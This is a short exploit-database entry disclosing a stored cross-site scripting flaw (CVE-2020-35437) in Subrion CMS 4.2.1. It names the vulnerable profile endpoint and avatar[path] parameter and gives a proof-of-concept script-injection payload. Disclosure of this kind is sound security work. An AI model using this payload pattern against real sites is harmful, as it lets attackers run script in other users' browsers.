Lucene search

K
packetstormIcekamPACKETSTORM:160783
HistoryJan 05, 2021 - 12:00 a.m.

Subrion CMS 4.2.1 Cross Site Scripting

2021-01-0500:00:00
icekam
packetstormsecurity.com
213
subrion cms
stored xss
vulnerability
profile
avatar path
cve-2020-35437

EPSS

0.001

Percentile

50.9%

`# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS  
# Date: 2020-12-15  
# Exploit Author: icekam  
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>  
# Software Link: https://github.com/intelliants/subrion  
# Version: Subrion CMS 4.2.1  
# CVE : CVE-2020-35437  
  
stored xss vulnerability in /_core/profile/.  
Reproduce through the avatar[path] parameter in post /_core/profile/ url.  
payload:"><sCrIpT>alert(1)</sCrIpT>  
  
https://github.com/intelliants/subrion/issues/880  
  
`

EPSS

0.001

Percentile

50.9%

Related for PACKETSTORM:160783